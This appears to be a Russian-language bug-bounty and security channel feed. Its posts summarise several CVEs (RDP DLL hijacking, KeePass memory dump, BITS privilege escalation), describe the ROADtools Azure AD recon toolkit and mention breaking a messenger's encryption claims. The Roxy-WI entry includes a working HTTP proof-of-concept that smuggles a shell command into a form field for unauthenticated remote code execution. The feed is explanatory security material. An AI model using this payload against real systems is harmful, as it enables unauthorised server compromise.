Полезные Google Dork'и для Bug Bounty

#bugbounty

Microsoft · Windows 10 22H2
Уязвимость удаленного выполнения кода в клиенте удаленного рабочего стола
CVE-2023-24905

Классическая техника под названием DLL Hijacking может использоваться для взлома RDP-клиента на устройствах Windows на ARM. Эта уязвимость позволяет злоумышленнику выполнить вредоносный код на системе жертвы, заменив легитимный DLL на вредоносный.

#CVE #RCE

Проверил, интересный материал. Хоть и написан специфично, зато прямолинейно и понятно)

​​🔴KeePass 2.X Master Password Dumper
CVE-2023-32784

Кратко:
CVE-2023-32784 - это уязвимость в менеджере паролей KeePass. Эта уязвимость позволяет злоумышленнику извлечь мастер-пароль из памяти программного обеспечения, даже когда рабочее пространство заблокировано или больше не работает. Это серьезная уязвимость, так как она может позволить злоумышленнику получить доступ ко всем паролям, хранящимся в базе данных KeePass.

Разбор:
Уязвимость вызвана ошибкой в обработке паролей KeePass. Когда пользователь вводит свой мастер-пароль, KeePass сохраняет его в памяти в открытом виде. Это означает, что пароль не зашифрован и может быть легко прочитан злоумышленником, если у него есть доступ к памяти процесса KeePass. Уязвимость может быть использована злоумышленником, который имеет физический доступ к компьютеру жертвы. Атакующий может использовать инструмент для выгрузки памяти процесса KeePass, а затем искать мастер-пароль в выгрузке. Как только злоумышленник получит мастер-пароль, он сможет получить доступ ко всем паролям, хранящимся в базе данных KeePass.

Исправление:
Уязвимость была исправлена в KeePass 2.54. Пользователи, использующие более старую версию KeePass, должны обновиться до 2.54, чтобы защитить себя от этой уязвимости.

#CVE #critical

Мы близки к восстанию машин...

Не, он точно что-то знает. Вопрос только правильно составлять промпт)

P.S. Bard не поддерживает никакие языки кроме US English, Japanese, Korean

🟣Тестируем заявленные супервозможности нового защищённого мессенджера

Как я случайно взломал «несуществующую» базу данных и нашёл все приватные ключи в мессенджере с «эталонным» уровнем шифрования. Рассказ о подробном анализе Converso и развенчивании смелых заявлений разработчиков о том, что их продукт не собирает пользовательские данные, не отслеживает метаданные, не использует серверы и вообще является передовым решением в области конфиденциального обмена сообщениями, превосходящим всем известные WhatsApp, Telegram и Signal.

#appsec

🔴ROADtools
(Rogue Office 365 and Azure (active) Directory tools)

ROADtools - это фреймворк для взаимодействия с Azure AD. Он состоит из библиотеки (roadlib) со следующими компонентами:

1. Инструмент ROADrecon для изучения Azure AD. ROADrecon - это инструмент для исследования Azure AD. Чтобы обеспечить полную гибкость, инструмент использует для этого 3 простых шага:
1.1. Аутентификация
1.2. Сбор данных
1.3. Исследование или преобразование данных
2. Инструмент ROADtools Token eXchange (roadtx). ROADtools Token eXchange, или сокращенно roadtx, - это инструмент для автоматизации и реализации процессов аутентификации и регистрации в Azure AD. Он ориентирован на токены, такие как (первичные) токены обновления и токены доступа.

Установка:
pip install roadrecon


pip install roadtx

#tools #recon

​​Microsoft: Windows Privilege Escalation
CVE-2020-0787

CVE-2020-0787 - это уязвимость повышения привилегий Windows, которая влияет на службу Background Intelligent Transfer Service (BITS). BITS - это служба, которая позволяет приложениям передавать файлы по сети в фоновом режиме. Уязвимость существует в том, как BITS обрабатывает символические ссылки. Символическая ссылка - это файл, который указывает на другой файл. Злоумышленник может использовать эту уязвимость, создав специально подготовленную символическую ссылку, которая при открытии пользователем с ограниченными правами позволит злоумышленнику выполнить произвольный код с повышенными привилегиями.

Уязвимость была обнаружена Jonas Lykkegaard. Microsoft выпустила обновление безопасности для устранения уязвимости 10 марта 2020 года. Чтобы использовать эту уязвимость, злоумышленник должен сначала войти в систему с ограниченными правами. Затем злоумышленник может запустить специально подготовленное приложение, которое может использовать уязвимость и получить контроль над затронутой системой.

#CVE #PrivEsc

​​🔴Roxy WI v6.1.0.0 Unauthenticated Remote Code Execution (RCE) via subprocess_execute
CVE-2022-31137

Это уязвимость удаленного выполнения кода в Roxy-WI, веб-интерфейсе для управления серверами Haproxy, Nginx, Apache и Keepalived. Уязвимость вызвана неправильной обработкой пользовательского ввода в файле /app/options.py. Злоумышленник может использовать эту уязвимость, отправив специально подготовленный HTTP-запрос, который содержит вредоносный код. Вредоносный код будет выполнен на уязвимой системе с привилегиями пользователя, запускающего Roxy-WI.

PoC:

POST /app/options.py HTTP/1.1
Host: 192.168.1.44
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:101.0) Gecko/20100101 Firefox/101.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 136
Origin: https://192.168.1.44
Referer: https://192.168.1.44/app/login.py
Connection: close

show_versions=1&token=&alert_consumer=1&serv=127.0.0.1&getcertalert_consumer=1&serv=127.0.0.1&ipbackend=

";id+##&backend_server=127.0.0.1

#CVE #POC

Предлагайте свои идеи/технологии на замену заблокированных. Если соберём список, то сделаю ресерч на что и как лучше переходить.